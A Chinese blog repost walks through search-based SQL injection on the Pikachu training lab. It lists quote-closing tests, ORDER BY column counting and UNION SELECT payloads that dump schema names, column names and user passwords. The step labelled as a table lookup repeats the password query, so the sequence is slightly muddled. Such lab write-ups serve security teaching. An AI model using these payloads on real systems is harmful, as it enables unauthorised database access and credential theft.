欢迎来到尧图网

客户服务 关于我们

您的位置:首页 > 健康 > 美食 > pikachu之sql lnjet之搜索型注入

pikachu之sql lnjet之搜索型注入

2025/7/5 12:02:57 来源:https://blog.csdn.net/LIU6636LIU/article/details/140638876  浏览:    关键词:pikachu之sql lnjet之搜索型注入

搜索型注入(Search-Based SQL Injection)是指在搜索框或类似的输入字段中进行SQL注入攻击。这种注入方法利用用户输入直接嵌入到SQL查询中的特性,通过构造恶意输入来操控数据库查询,获取或篡改数据。

输入%看看

那么依旧进行闭合测试

allen' and 1=1--+正常显示

allen' and 1=2     --+没法搜到

然后开始猜字段

allen' order by 1 --+

allen' order by 2 --+

allen' order by 3 --+正常

allen' order by 4 --+unknown

所以为3

开始查询数据库

allen' union select 1,2,(select group_concat(schema_name) from information_schema.schemata) --+

查表

allen' union select 1,2,(select group_concat(username,'=',password) from users) --+

查字段

allen' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='users') --+

接着

查用户名和密码

allen' union select 1,2,(select group_concat(username,'=',password) from users) --+

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com

热搜词